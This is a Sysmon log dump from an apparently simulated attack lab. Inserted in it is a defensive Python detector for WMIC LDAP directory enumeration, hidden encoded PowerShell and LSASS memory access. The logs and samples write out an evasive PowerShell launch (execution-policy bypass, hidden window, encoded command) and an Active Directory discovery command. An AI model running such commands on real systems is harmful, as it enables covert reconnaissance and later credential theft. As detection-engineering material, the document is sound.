10341000x800000000000000035085653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:42.942{B81B27B7-4130-611D-9D00-00000000C801}31603808C:\Windows\system32\csrss.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.942{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.
ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035085651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.949{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® 
Operating SystemMicrosoft Corporationwmic.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountnameC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e 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 23542300x800000000000000035085650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.758{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=399B8CAD4C45B3CBEF0D350100B27856,SHA256=D6ECBB9F0AB5E89870A612180FE3618DC96157C438777AC2CBCCE74D2582A2D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.758{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=60603BA9880E9712AF6C6570CC019085,SHA256=CD5E56B0A0AE3FE5558502C96AA5EB00534EBAFB2F3DE885CDA73D85EBFFD77B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.758{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=97D98F8DA5FC6E538047BB0A8521DD85,SHA256=321BB2F80C9ECF83F38ABF026DFCA55B5A0CCBAFCEB54DB8BF46511841790911,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.758{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=6DBCA2DEB6A20F0C96A7EA2E16036E5D,SHA256=78BB266E9EBF3CDA9C43CA5E8A4D0AB670E84099DD5724581F652259800DCFB5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.758{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=F67C06F9034BEFDAFB41A043E3B84BA8,SHA256=A5E8E6294E4A5A7D187F36101F8CB7EF40339BD87DF2318FDFDC9DA407F50104,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.758{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=CAD745E102C446221419F0401F224D75,SHA256=657D8250CFB47F6864A38959E2DA431280E90E0618D2DA7F3BDDD802DB77DC61,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
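The record of interest in this stretch of the dump is the Event ID 1 (process create) for `WMIC.exe` running `/NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname`, spawned by `powershell -exec bypass -Noninteractive -windowstyle hidden -e <encoded>`: an Active Directory computer-account enumeration through the WMI LDAP provider rather than through `net`, `dsquery` or the AD module, which is why it is worth a dedicated rule. The surrounding Event ID 10 (process access) records involving `lsass.exe` are background noise: `lsass.exe` is the *source* opening `WMIC.exe` from `SspiSrv.dll` (authentication), and `svchost.exe` via `lsm.dll` opens `lsass.exe` with `0x1400` (query rights only). A credential-dump rule has to check direction and access mask, not just the image name. The following detector is an added example, not part of the dataset on this page or of Attack Range; it uses Sysmon's own field names (`Image`, `CommandLine`, `ParentCommandLine`, `SourceImage`, `TargetImage`, `GrantedAccess`), and its sample records are constructed from the values visible above. The encoded payload (the page's copy is elided) and the `hypothetical_dumper.exe` path are assumptions made to exercise the positive cases.

```python
import base64
import binascii
import re

# PROCESS_* access rights that show up in Sysmon Event ID 10 GrantedAccess masks.
PROCESS_VM_READ = 0x0010
PROCESS_DUP_HANDLE = 0x0040
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1FFFFF

# Rights needed to read LSASS memory (MiniDumpWriteDump style) or to duplicate an
# lsass handle; 0x1000/0x1400 (query only), as seen throughout this log, is not enough.
LSASS_DUMP_RIGHTS = PROCESS_VM_READ | PROCESS_DUP_HANDLE

# WMIC using the LDAP provider namespace (AD enumeration without dsquery/net/AD module).
LDAP_NAMESPACE_RE = re.compile(r"/namespace:\\\\root\\directory\\ldap", re.IGNORECASE)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_PREFIXES = ["encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)]
ENCODED_FLAG_RE = re.compile(
    r"(?:^|\s)-(?:" + "|".join(_ENC_PREFIXES) + r")\s+(\S+)", re.IGNORECASE
)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or None."""
    m = ENCODED_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify_process_create(ev):
    """Findings for a Sysmon Event ID 1 record (process create)."""
    findings = []
    image = ev.get("Image", "").lower()
    parent_cmd = ev.get("ParentCommandLine", "")
    if image.endswith("\\wmic.exe") and LDAP_NAMESPACE_RE.search(ev.get("CommandLine", "")):
        findings.append("wmic_ldap_ad_discovery")
    if decode_encoded_command(parent_cmd) is not None:
        findings.append("parent_powershell_encoded")
        # -ExecutionPolicy Bypass / -WindowStyle Hidden on the parent raise severity.
        if re.search(r"-ex\w*\s+bypass", parent_cmd, re.I) or re.search(r"-w\w*\s+hidden", parent_cmd, re.I):
            findings.append("parent_powershell_evasion_flags")
    return findings


def lsass_access_finding(ev):
    """Finding for a Sysmon Event ID 10 record, or None when it is benign."""
    source = ev.get("SourceImage", "").lower()
    target = ev.get("TargetImage", "").lower()
    granted = int(ev.get("GrantedAccess", "0"), 16)
    if not target.endswith("\\lsass.exe"):
        # lsass.exe as SourceImage (SspiSrv authentication work) is not a dump.
        return None
    if granted == PROCESS_ALL_ACCESS or granted & LSASS_DUMP_RIGHTS:
        return f"lsass_memory_access:{source}:0x{granted:x}"
    return None


def run_detections(events):
    """Map each record to its list of findings (empty list = nothing flagged)."""
    out = []
    for ev in events:
        if ev.get("EventID") == 1:
            out.append(classify_process_create(ev))
        elif ev.get("EventID") == 10:
            f = lsass_access_finding(ev)
            out.append([f] if f else [])
        else:
            out.append([])
    return out


# Constructed sample records mirroring the values visible in the dump above.
SAMPLE_DECODED_COMMAND = r"wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname"
SAMPLE_ENCODED_PAYLOAD = base64.b64encode(SAMPLE_DECODED_COMMAND.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {   # Event ID 1: the WMIC record from the page; the parent's -e payload is constructed.
        "EventID": 1,
        "Image": r"C:\Windows\System32\wbem\WMIC.exe",
        "CommandLine": r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname',
        "User": r"ATTACKRANGE\REED_SCHMIDT",
        "IntegrityLevel": "Medium",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentCommandLine": "powershell -exec bypass -Noninteractive -windowstyle hidden -e " + SAMPLE_ENCODED_PAYLOAD,
    },
    {   # Event ID 10: lsass.exe is the SOURCE opening WMIC.exe (SspiSrv), benign.
        "EventID": 10, "SourceImage": r"C:\Windows\system32\lsass.exe",
        "TargetImage": r"C:\Windows\System32\Wbem\WMIC.exe", "GrantedAccess": "0x1478",
    },
    {   # Event ID 10: svchost.exe (lsm.dll) querying lsass.exe with 0x1400, benign.
        "EventID": 10, "SourceImage": r"C:\Windows\system32\svchost.exe",
        "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1400",
    },
    {   # Event ID 10: hypothetical dump attempt (not on this page), VM_READ on lsass.
        "EventID": 10, "SourceImage": r"C:\Users\reed_schmidt\hypothetical_dumper.exe",
        "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
    },
]

if __name__ == "__main__":
    for ev, findings in zip(SAMPLE_EVENTS, run_detections(SAMPLE_EVENTS)):
        print(ev["EventID"], findings)
```

Only the first and last sample records are flagged. The two `lsass.exe` records that mirror this page's Event ID 10 traffic produce nothing, which is the intended outcome: a rule keyed on `lsass.exe` appearing anywhere in the event, or on `GrantedAccess` alone without checking `TargetImage`, would fire on every SspiSrv and lsm call shown above.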
23542300x800000000000000035085644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.243{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09009648DEECFD9FE6A642C37D24A364,SHA256=E25779132726FEEDD780CCDFE1F9F854AB1410E3937358129296B3EFA0EA9FAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.957{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17F996CD8A5C2E5911B4DC962CEDCE58,SHA256=03A94A3D1DF895E61A0FE75DD08FB777F09109437D481228379C804872B73AAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.957{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C2ABB86CA1A86A19ADC1737C91087030,SHA256=6FE5B2C998DB091F8F490836B3408EA84083D47EC509FF6921226CBA8DD7440E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:43.777{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.777{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:43.777{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.757{B81B27B7-4F8B-613A-6E90-03000000C801}37684660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.657{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40140AC050BC2C615677337DAEFC801F,SHA256=AA4D64EE9C3E917918709E1ADEF48B35BD5157DA8F502FA5C6E54177515747C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.579{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F8B-613A-6E90-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.579{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:43.579{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.579{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:43.579{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.579{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4F8B-613A-6E90-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.579{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F8B-613A-6E90-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
